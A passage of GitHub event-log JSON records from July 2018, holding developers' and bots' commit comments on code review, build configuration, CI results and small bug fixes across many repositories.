10:41 PM, Matthew Bauer <notifications@github.com> wrote:\n> > \n> > aliases: add forceSystem alias for i686-linux\n> > \n> > forceSystem was used in various places outside of Nixpkgs. Doing it in\n> > a generic way gets difficult due to how the system is parsed. Instead,\n> > we just provide a value for (forceSystem \"i686-linux\" \"i386\"). Other\n> > uses of forceSystem throw an error.\n> > \n> > /cc @grahamc @ericson2314\n> > \n> > -- \n> > You are receiving this because you were mentioned.\n> > Reply to this email directly or view it on GitHub:\n> > https://github.com/matthewbauer/nixpkgs/commit/3f164a1de6f53cc1bcaa5164c3f5452ede09d1f9\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-15T03:33:43Z"}
{"id":"7966738430","type":"CommitCommentEvent","actor":{"login":"JonathanMcCaffrey"},"repo":{"name":"getbraincloud/braincloud-js"},"payload":{"comment":{"id":29711262,"position":null,"line":null,"path":null,"commit_id":"4febb19c158eec7e824cab1f35285ccebf1c9f57","created_at":"2018-07-15T03:34:33Z","updated_at":"2018-07-15T03:34:33Z","author_association":"CONTRIBUTOR","body":"I didn't see the final console.log from the unit tests on Jenkins. Unless my eyes missed it, I assume it had something to do with the job terminating too quickly after that console log. I observed the log after adding the delay."}},"created_at":"2018-07-15T03:34:33Z"}
{"id":"7966739620","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29711263,"position":null,"line":null,"path":null,"commit_id":"20ca6f9cfed3cda90e18746150c3f47cdaeeb4ae","created_at":"2018-07-15T03:35:58Z","updated_at":"2018-07-15T03:35:58Z","author_association":"OWNER","body":"because if they don't have a Q, but we still have one, \r\nmaybe king danger should stay higher since they probably have an extra piece"}},"created_at":"2018-07-15T03:35:58Z"}
{"id":"7966741227","type":"CommitCommentEvent","actor":{"login":"tuanvpham"},"repo":{"name":"Visteus/Shopping-Manager"},"payload":{"comment":{"id":29711265,"position":null,"line":null,"path":null,"commit_id":"6ae5f5a1971c0f77ee4ff9351acd723464855977","created_at":"2018-07-15T03:37:45Z","updated_at":"2018-07-15T03:37:45Z","author_association":"COLLABORATOR","body":"#5 This fixes the log out not click login twice to login again. Better to use redirect than render"}},"created_at":"2018-07-15T03:37:45Z"}
{"id":"7966741304","type":"CommitCommentEvent","actor":{"login":"CyrusNajmabadi"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":29711266,"position":43,"line":70,"path":"src/VisualStudio/Core/Def/Implementation/Utilities/ServiceInitializer.cs","commit_id":"4890c8e1874132199adad253b14403bd0d817471","created_at":"2018-07-15T03:37:50Z","updated_at":"2018-07-15T03:37:50Z","author_association":"CONTRIBUTOR","body":"that's fair.  we should just doc things to make that clear.  Thanks!"}},"created_at":"2018-07-15T03:37:50Z"}
{"id":"7966742380","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29711268,"position":null,"line":null,"path":null,"commit_id":"69a2ce29eba0ed45134323cce3ed08b5675e13e2","created_at":"2018-07-15T03:39:05Z","updated_at":"2018-07-15T03:39:05Z","author_association":"CONTRIBUTOR","body":"Excelente. Buenos cambios. "}},"created_at":"2018-07-15T03:39:05Z"}
{"id":"7966744408","type":"CommitCommentEvent","actor":{"login":"SugahShane"},"repo":{"name":"SugahShane/Market_Analysis"},"payload":{"comment":{"id":29711269,"position":null,"line":null,"path":null,"commit_id":"390ff8c60ee390140880678708079facbb25934f","created_at":"2018-07-15T03:41:22Z","updated_at":"2018-07-15T03:41:22Z","author_association":"OWNER","body":"ship it"}},"created_at":"2018-07-15T03:41:22Z"}
{"id":"7966745819","type":"CommitCommentEvent","actor":{"login":"jIdle"},"repo":{"name":"jIdle/CS333"},"payload":{"comment":{"id":29711271,"position":16,"line":594,"path":"xv6/proc.c","commit_id":"748e62e1002cb37263aa7af73db243b43565913b","created_at":"2018-07-15T03:43:05Z","updated_at":"2018-07-15T03:43:05Z","author_association":"OWNER","body":"Trap 14, Page Fault, was triggered by \"i > max\". Because i starts at 0, and max isn't an index but rather an amount, they were off by 1. "}},"created_at":"2018-07-15T03:43:05Z"}
{"id":"7966748867","type":"CommitCommentEvent","actor":{"login":"BroderickCarlin"},"repo":{"name":"TDHolmes/Harma"},"payload":{"comment":{"id":29711276,"position":33,"line":8,"path":"Pensel/firmware/peripherals/USB/hw_config.c","commit_id":"c1a2f0950b8859ec5750bcd3f6a06e3090d881c0","created_at":"2018-07-15T03:46:24Z","updated_at":"2018-07-15T03:46:24Z","author_association":"NONE","body":"but why?!?!"}},"created_at":"2018-07-15T03:46:24Z"}
{"id":"7966750211","type":"CommitCommentEvent","actor":{"login":"IamNoobDude"},"repo":{"name":"0XE4/Pi-Holed"},"payload":{"comment":{"id":29711277,"position":27,"line":27,"path":"ip_logging_domains","commit_id":"04eecb4d508c7b2f083b4d96827af7f0d7efb7f2","created_at":"2018-07-15T03:47:52Z","updated_at":"2018-07-15T03:47:52Z","author_association":"NONE","body":"This site doesn't grab IPs. It's a file repo site for a particular game."}},"created_at":"2018-07-15T03:47:52Z"}
{"id":"7966750818","type":"CommitCommentEvent","actor":{"login":"BroderickCarlin"},"repo":{"name":"TDHolmes/Harma"},"payload":{"comment":{"id":29711279,"position":70,"line":49,"path":"Pensel/firmware/peripherals/USB/usb_prop.c","commit_id":"c1a2f0950b8859ec5750bcd3f6a06e3090d881c0","created_at":"2018-07-15T03:48:31Z","updated_at":"2018-07-15T03:48:31Z","author_association":"NONE","body":"You are switching between camelcase and snake case "}},"created_at":"2018-07-15T03:48:31Z"}
{"id":"7966751358","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29711280,"position":null,"line":null,"path":null,"commit_id":"d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf","created_at":"2018-07-15T03:49:09Z","updated_at":"2018-07-15T03:49:09Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (Unknown) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-15T03:49:09Z"}
{"id":"7966752698","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29711281,"position":null,"line":null,"path":null,"commit_id":"1c0382f8a15ff9d83af17b3145aa49b03ad3c62f","created_at":"2018-07-15T03:50:42Z","updated_at":"2018-07-15T03:50:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Me in my idioticness tried to make the bot have more than one prefix (In a really dumb way)](https://trello.com/c/10L2nq7s/29-me-in-my-idioticness-tried-to-make-the-bot-have-more-than-one-prefix-in-a-really-dumb-way)"}},"created_at":"2018-07-15T03:50:42Z"}
{"id":"7966752699","type":"CommitCommentEvent","actor":{"login":"nbaikoziev"},"repo":{"name":"nbaikoziev/www.prestashopautomation.com"},"payload":{"comment":{"id":29711282,"position":null,"line":null,"path":null,"commit_id":"b6688b40b8dd7d54a7ffa7e0ee5c1707a15982e8","created_at":"2018-07-15T03:50:42Z","updated_at":"2018-07-15T03:50:42Z","author_association":"OWNER","body":"adden new url3"}},"created_at":"2018-07-15T03:50:42Z"}
{"id":"7966753439","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29711283,"position":null,"line":null,"path":null,"commit_id":"a7666f11a6cdf4ce4fe420f1c57ea8d4a3968bdd","created_at":"2018-07-15T03:51:35Z","updated_at":"2018-07-15T03:51:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the code public on github (with the AGPL-3.0 license).](https://trello.com/c/76FgKpiT/19-make-the-code-public-on-github-with-the-agpl-30-license)"}},"created_at":"2018-07-15T03:51:35Z"}
{"id":"7966755361","type":"CommitCommentEvent","actor":{"login":"sijie"},"repo":{"name":"ArvinDevel/bookkeeper"},"payload":{"comment":{"id":29711284,"position":13,"line":201,"path":"stream/proto/src/main/proto/stream.proto","commit_id":"646b46d21b35906be0a7a2ca4015cc2c991bde83","created_at":"2018-07-15T03:53:48Z","updated_at":"2018-07-15T03:53:48Z","author_association":"NONE","body":"better to have a structure called `Schema`:\r\n\r\n```\r\nmessage SchemaInfo {\r\n    map<string, bytes> fields = 0;\r\n}\r\n```\r\n\r\n```\r\nSchemaInfo schema = 8;\r\n```"}},"created_at":"2018-07-15T03:53:48Z"}
{"id":"7966755959","type":"CommitCommentEvent","actor":{"login":"lukehutch"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711286,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T03:54:30Z","updated_at":"2018-07-15T03:54:30Z","author_association":"OWNER","body":"@johnou I fixed this (and one other JDK 1.7 incompatibility). However, I get the error \"maven-enforcer-plugin (goal \"enforce\") is ignored by m2e.\"  I messed around a bunch with the pluginManagement section, but could not get it to go away. Frankly Maven is still a maddening mystery to me. Any chance you could please take a look, and help me figure out how to fix this warning? I would also appreciate it if you could please check over the rest of the `pom.xml` file, since there are probably other things that need to be fixed too..."}},"created_at":"2018-07-15T03:54:30Z"}
{"id":"7966756918","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29711288,"position":null,"line":null,"path":null,"commit_id":"a8c53e08e961cad86b391dac6b3c212417960d89","created_at":"2018-07-15T03:55:44Z","updated_at":"2018-07-15T03:55:44Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-15T03:55:44Z"}
{"id":"7966765603","type":"CommitCommentEvent","actor":{"login":"joshkindhart"},"repo":{"name":"joshkindhart/Rainbow-Poem"},"payload":{"comment":{"id":29711298,"position":null,"line":null,"path":null,"commit_id":"636901b13e75d9473896022d00d1a8d09029c447","created_at":"2018-07-15T04:05:00Z","updated_at":"2018-07-15T04:05:00Z","author_association":"OWNER","body":"My contribution"}},"created_at":"2018-07-15T04:05:00Z"}
{"id":"7966766957","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29711299,"position":null,"line":null,"path":null,"commit_id":"de7e44a534c19dad870b4a1ff4648d58515bc939","created_at":"2018-07-15T04:06:20Z","updated_at":"2018-07-15T04:06:20Z","author_association":"NONE","body":"smh, atleast do proper commit messages\r\n"}},"created_at":"2018-07-15T04:06:20Z"}
{"id":"7966767098","type":"CommitCommentEvent","actor":{"login":"whitefire0"},"repo":{"name":"whitefire0/the-cave-machine"},"payload":{"comment":{"id":29711300,"position":5,"line":81,"path":"app.js","commit_id":"09e687d7cf5c0e551e45539990d45d9425599ab3","created_at":"2018-07-15T04:06:30Z","updated_at":"2018-07-15T04:06:30Z","author_association":"OWNER","body":"Yes - but how does this implementation of reduce achieve the desired effect? Ideally you want to be able to write down the flow of the algorithm. This can be done by tracing all possible states through the mini-machine, building up an incremental picture, and then summarising in a comment. It may just be that your final comment is a description of what it does"}},"created_at":"2018-07-15T04:06:30Z"}
{"id":"7966767997","type":"CommitCommentEvent","actor":{"login":"whitefire0"},"repo":{"name":"whitefire0/the-cave-machine"},"payload":{"comment":{"id":29711301,"position":52,"line":205,"path":"app.js","commit_id":"09e687d7cf5c0e551e45539990d45d9425599ab3","created_at":"2018-07-15T04:07:34Z","updated_at":"2018-07-15T04:07:34Z","author_association":"OWNER","body":"This isn't correct - it has the same pattern as the test above but you have commented it as running differently"}},"created_at":"2018-07-15T04:07:34Z"}
{"id":"7966768057","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29711302,"position":null,"line":null,"path":null,"commit_id":"dd81bf547e92c2a41c26e526a0ed89d385fabd3a","created_at":"2018-07-15T04:07:39Z","updated_at":"2018-07-15T04:07:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bot crashes upon using jb!info (alias: jb!about)](https://trello.com/c/M1cXcLAR/31-bot-crashes-upon-using-jbinfo-alias-jbabout)"}},"created_at":"2018-07-15T04:07:39Z"}
{"id":"7966768448","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29711303,"position":null,"line":null,"path":null,"commit_id":"a6aec55a46969a648fafb2eca415941cc1ea583f","created_at":"2018-07-15T04:08:06Z","updated_at":"2018-07-15T04:08:06Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `ac4c8d78-87e4-11e8-9b88-8822b9735725`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-15T04:08:06Z"}
{"id":"7966768612","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29711304,"position":null,"line":null,"path":null,"commit_id":"42adafaf4d7cfcb921cd77c2b025e7b3b0542672","created_at":"2018-07-15T04:08:16Z","updated_at":"2018-07-15T04:08:16Z","author_association":"NONE","body":"without TARGET_USES_HWC2 := true in bc.mk i dont beleive hwc2 is actually being properly built"}},"created_at":"2018-07-15T04:08:16Z"}
{"id":"7966769290","type":"CommitCommentEvent","actor":{"login":"mahmoud-abuzaina"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29711305,"position":null,"line":null,"path":null,"commit_id":"03ab64c3a68f3b990bf690ede06e3066ad4e35a0","created_at":"2018-07-15T04:09:01Z","updated_at":"2018-07-15T04:09:01Z","author_association":"CONTRIBUTOR","body":"you are right, that was missing from my commit somehow. I saw your PR, thanks for submitting that."}},"created_at":"2018-07-15T04:09:01Z"}
{"id":"7966769751","type":"CommitCommentEvent","actor":{"login":"whitefire0"},"repo":{"name":"whitefire0/the-cave-machine"},"payload":{"comment":{"id":29711306,"position":23,"line":154,"path":"app.js","commit_id":"85d89bf2c07615d4ea7c1fd2bb406209df79ec4f","created_at":"2018-07-15T04:09:34Z","updated_at":"2018-07-15T04:09:34Z","author_association":"OWNER","body":"Check the nesting of the if/else conditional, and the switch conditional. Under what conditions does this else _actually_ run? It isn't if 'all' cases fail."}},"created_at":"2018-07-15T04:09:34Z"}
{"id":"7966776255","type":"CommitCommentEvent","actor":{"login":"shnaz1"},"repo":{"name":"ContributorCovenant/contributor_covenant"},"payload":{"comment":{"id":29711314,"position":11,"line":17,"path":"content/version/1/4/code-of-conduct.md","commit_id":"ca7bb9bf2dc2547c53614387130e508457688887","created_at":"2018-07-15T04:16:29Z","updated_at":"2018-07-15T04:16:29Z","author_association":"NONE","body":" sex characteristics, "}},"created_at":"2018-07-15T04:16:29Z"}
{"id":"7966779313","type":"CommitCommentEvent","actor":{"login":"secretsparkle"},"repo":{"name":"secretsparkle/idempotence"},"payload":{"comment":{"id":29711316,"position":null,"line":null,"path":null,"commit_id":"dd496032588b37321b9d0f011e3a3c481142167d","created_at":"2018-07-15T04:20:10Z","updated_at":"2018-07-15T04:20:10Z","author_association":"OWNER","body":" I think we need to somehow change the value pieceCount is\r\nevaluated against as the game progresses (which will probably speed up the tree\r\ngeneration) or we gotta lose it and just check for the number of rows."}},"created_at":"2018-07-15T04:20:10Z"}
{"id":"7966781578","type":"CommitCommentEvent","actor":{"login":"llaugusty"},"repo":{"name":"llaugusty/back-end"},"payload":{"comment":{"id":29711317,"position":1,"line":1,"path":"contracts/migrations/3_create_sample_listings.js","commit_id":"200096784c4ee823f86989fe4a813155293b73be","created_at":"2018-07-15T04:22:55Z","updated_at":"2018-07-15T04:22:55Z","author_association":"OWNER","body":"lol"}},"created_at":"2018-07-15T04:22:55Z"}
{"id":"7966786714","type":"CommitCommentEvent","actor":{"login":"andykillone"},"repo":{"name":"andykillone/Example"},"payload":{"comment":{"id":29711325,"position":null,"line":null,"path":null,"commit_id":"8341d2f8f00342ea2e000d8f68172fd7cde0cae9","created_at":"2018-07-15T04:29:09Z","updated_at":"2018-07-15T04:29:09Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-15T04:29:09Z"}
{"id":"7966788032","type":"CommitCommentEvent","actor":{"login":"bizlift"},"repo":{"name":"bizlift/bittube-miner-hive"},"payload":{"comment":{"id":29711330,"position":null,"line":null,"path":null,"commit_id":"f6f15a713df2e2bed129b4bb99e432372a0b8aed","created_at":"2018-07-15T04:30:39Z","updated_at":"2018-07-15T04:30:39Z","author_association":"OWNER","body":"Thanks for feedback.  Did you install microhttpd first?\r\n\r\n`sudo apt install libmicrohttpd-dev`\r\n"}},"created_at":"2018-07-15T04:30:39Z"}
{"id":"7966788149","type":"CommitCommentEvent","actor":{"login":"andykillone"},"repo":{"name":"andykillone/Example"},"payload":{"comment":{"id":29711333,"position":null,"line":null,"path":null,"commit_id":"3576ae1bcd7c7d2ea4128c9a7418617ebafa8120","created_at":"2018-07-15T04:30:46Z","updated_at":"2018-07-15T04:30:46Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-15T04:30:46Z"}
{"id":"7966789279","type":"CommitCommentEvent","actor":{"login":"mateor"},"repo":{"name":"pantsbuild/pants"},"payload":{"comment":{"id":29711334,"position":null,"line":null,"path":null,"commit_id":"22db5cf106a448edcd211f1d1a89b169fe5b2550","created_at":"2018-07-15T04:32:10Z","updated_at":"2018-07-15T04:32:10Z","author_association":"MEMBER","body":"🎉 "}},"created_at":"2018-07-15T04:32:10Z"}
{"id":"7966793313","type":"CommitCommentEvent","actor":{"login":"HunterMcGushion"},"repo":{"name":"HunterMcGushion/hyperparameter_hunter"},"payload":{"comment":{"id":29711337,"position":null,"line":null,"path":null,"commit_id":"84ac94281a0a1276f32ba9df45481afee0579f77","created_at":"2018-07-15T04:36:57Z","updated_at":"2018-07-15T04:36:57Z","author_association":"OWNER","body":"Nice job, @HunterMcGushion. I was wondering where the installation instructions were."}},"created_at":"2018-07-15T04:36:57Z"}
{"id":"7966798023","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29711341,"position":202,"line":594,"path":"fluxion.sh","commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-15T04:42:35Z","updated_at":"2018-07-15T04:42:35Z","author_association":"MEMBER","body":"I noticed the back-chain for undo wasn't working. I just noticed this line introduced two bugs, one by removing the selection of the last item, and the second is sub-scripting the wrong identifier. I'm posting the fix."}},"created_at":"2018-07-15T04:42:35Z"}
{"id":"7966801197","type":"CommitCommentEvent","actor":{"login":"GedMarc"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711349,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T04:46:20Z","updated_at":"2018-07-15T04:46:20Z","author_association":"NONE","body":"That's an IDE thing hey, don't blame the maven! xD Eclipse and maven do not gel together well at all... Netbeans actually has better integration xD The annotation processing is horrific - \r\n\r\nIt's a life cycle mapping - \r\n```\r\nbuild>\r\n  <pluginManagement>\r\n    <plugins>\r\n      <plugin>\r\n        <groupId>org.eclipse.m2e</groupId>\r\n        <artifactId>lifecycle-mapping</artifactId>\r\n        <version>1.0.0</version>\r\n        <configuration>\r\n          <lifecycleMappingMetadata>\r\n            <pluginExecutions>\r\n              <pluginExecution>\r\n                <pluginExecutionFilter>\r\n                  <groupId>org.apache.maven.plugins</groupId>\r\n                  <artifactId>maven-enforcer-plugin</artifactId>\r\n                  <versionRange>[1.0.0,)</versionRange>\r\n                  <goals>\r\n                    <goal>enforce</goal>\r\n                  </goals>\r\n                </pluginExecutionFilter>\r\n                <action>\r\n                  <ignore />\r\n                </action>\r\n              </pluginExecution>\r\n            </pluginExecutions>\r\n          </lifecycleMappingMetadata>\r\n        </configuration>\r\n      </plugin>\r\n    </plugins>\r\n  </pluginManagement>\r\n</build>\r\n```"}},"created_at":"2018-07-15T04:46:20Z"}
{"id":"7966801676","type":"CommitCommentEvent","actor":{"login":"GedMarc"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711350,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T04:46:55Z","updated_at":"2018-07-15T04:46:55Z","author_association":"NONE","body":"Oh, switch out ignore\r\n"}},"created_at":"2018-07-15T04:46:55Z"}
{"id":"7966802140","type":"CommitCommentEvent","actor":{"login":"ajayns"},"repo":{"name":"collective/gatsby-source-plone"},"payload":{"comment":{"id":29711351,"position":null,"line":null,"path":null,"commit_id":"5b2138f9593138b356ad206fee86f3326f3b335f","created_at":"2018-07-15T04:47:31Z","updated_at":"2018-07-15T04:47:31Z","author_association":"CONTRIBUTOR","body":"Oh yes makes sense, with the codebase growing a bit in size, I didn't notice this when I went through it all. Hmm must keep this in mind in the future @datakurre "}},"created_at":"2018-07-15T04:47:31Z"}
{"id":"7966802305","type":"CommitCommentEvent","actor":{"login":"GedMarc"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711352,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T04:47:43Z","updated_at":"2018-07-15T04:47:43Z","author_association":"NONE","body":"```\r\n<action>\r\n               <execute>\r\n                 <runOnIncremental>false</runOnIncremental>\r\n               </execute >\r\n             </action>\r\n```"}},"created_at":"2018-07-15T04:47:43Z"}
{"id":"7966803556","type":"CommitCommentEvent","actor":{"login":"Deanfost"},"repo":{"name":"Deanfost/ar-gallery"},"payload":{"comment":{"id":29711353,"position":null,"line":null,"path":null,"commit_id":"dfcdc4a253310ef513917924c6eb6a31827bc57c","created_at":"2018-07-15T04:49:10Z","updated_at":"2018-07-15T04:49:10Z","author_association":"OWNER","body":"Playing video in Sceneview is currently not possible."}},"created_at":"2018-07-15T04:49:10Z"}
{"id":"7966804053","type":"CommitCommentEvent","actor":{"login":"TDHolmes"},"repo":{"name":"TDHolmes/Harma"},"payload":{"comment":{"id":29711355,"position":33,"line":8,"path":"Pensel/firmware/peripherals/USB/hw_config.c","commit_id":"c1a2f0950b8859ec5750bcd3f6a06e3090d881c0","created_at":"2018-07-15T04:49:36Z","updated_at":"2018-07-15T04:49:36Z","author_association":"OWNER","body":"Because, it is between me and my code!! Get out of my way! :p"}},"created_at":"2018-07-15T04:49:36Z"}
{"id":"7966804594","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29711356,"position":null,"line":null,"path":null,"commit_id":"58c465454e255c761ce70b7e212e4b8e2c96efac","created_at":"2018-07-15T04:50:15Z","updated_at":"2018-07-15T04:50:15Z","author_association":"MEMBER","body":"#1138"}},"created_at":"2018-07-15T04:50:15Z"}
{"id":"7966805377","type":"CommitCommentEvent","actor":{"login":"TDHolmes"},"repo":{"name":"TDHolmes/Harma"},"payload":{"comment":{"id":29711357,"position":70,"line":49,"path":"Pensel/firmware/peripherals/USB/usb_prop.c","commit_id":"c1a2f0950b8859ec5750bcd3f6a06e3090d881c0","created_at":"2018-07-15T04:51:16Z","updated_at":"2018-07-15T04:51:16Z","author_association":"OWNER","body":"Not all of this is my function naming still. I mass-modified `Virtual_Com_Port` -> `penselUSB`. I'll probably clean up more still, but I actually sometimes like using the pattern `camelCaseMainSubject_camelCaseSubThing`"}},"created_at":"2018-07-15T04:51:16Z"}
{"id":"7966806558","type":"CommitCommentEvent","actor":{"login":"BroderickCarlin"},"repo":{"name":"TDHolmes/Harma"},"payload":{"comment":{"id":29711359,"position":33,"line":8,"path":"Pensel/firmware/peripherals/USB/hw_config.c","commit_id":"c1a2f0950b8859ec5750bcd3f6a06e3090d881c0","created_at":"2018-07-15T04:52:50Z","updated_at":"2018-07-15T04:52:50Z","author_association":"NONE","body":"dafuq"}},"created_at":"2018-07-15T04:52:50Z"}
{"id":"7966807744","type":"CommitCommentEvent","actor":{"login":"BroderickCarlin"},"repo":{"name":"TDHolmes/Harma"},"payload":{"comment":{"id":29711362,"position":70,"line":49,"path":"Pensel/firmware/peripherals/USB/usb_prop.c","commit_id":"c1a2f0950b8859ec5750bcd3f6a06e3090d881c0","created_at":"2018-07-15T04:54:21Z","updated_at":"2018-07-15T04:54:21Z","author_association":"NONE","body":"`camelCaseMainSubject_camelCaseSubThing` is ideal but you mixing in some other odd things that you should fix ;D"}},"created_at":"2018-07-15T04:54:21Z"}
{"id":"7966808501","type":"CommitCommentEvent","actor":{"login":"lukehutch"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711363,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T04:55:17Z","updated_at":"2018-07-15T04:55:17Z","author_association":"OWNER","body":"I tried almost that exact thing. See head revision. Adding that section to pluginManagement does not get rid of the warning. And without the standard plugin section, this pluginManagement does not alone run the Animal Sniffer action."}},"created_at":"2018-07-15T04:55:17Z"}
{"id":"7966809436","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29711365,"position":null,"line":null,"path":null,"commit_id":"f92c61edc745646340b00dc63995a371b8d302e2","created_at":"2018-07-15T04:56:25Z","updated_at":"2018-07-15T04:56:25Z","author_association":"MEMBER","body":"Just to clarify, the difference is that on the deleted part, the subscript was for `__fluxion_done__namespace`, but it was meant to subscript the following, like so: `FXDLog_<namespace>[-1]`."}},"created_at":"2018-07-15T04:56:25Z"}
{"id":"7966810307","type":"CommitCommentEvent","actor":{"login":"Greeem"},"repo":{"name":"Greeem/SIVA"},"payload":{"comment":{"id":29711366,"position":null,"line":null,"path":null,"commit_id":"a438763a99cd21be38afc99d1071bd812c47a169","created_at":"2018-07-15T04:57:23Z","updated_at":"2018-07-15T04:57:23Z","author_association":"OWNER","body":"probably not needed but whatever"}},"created_at":"2018-07-15T04:57:23Z"}
{"id":"7966814419","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29711375,"position":null,"line":null,"path":null,"commit_id":"d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf","created_at":"2018-07-15T05:01:48Z","updated_at":"2018-07-15T05:01:48Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (Unknown) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2323 of 2323 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a 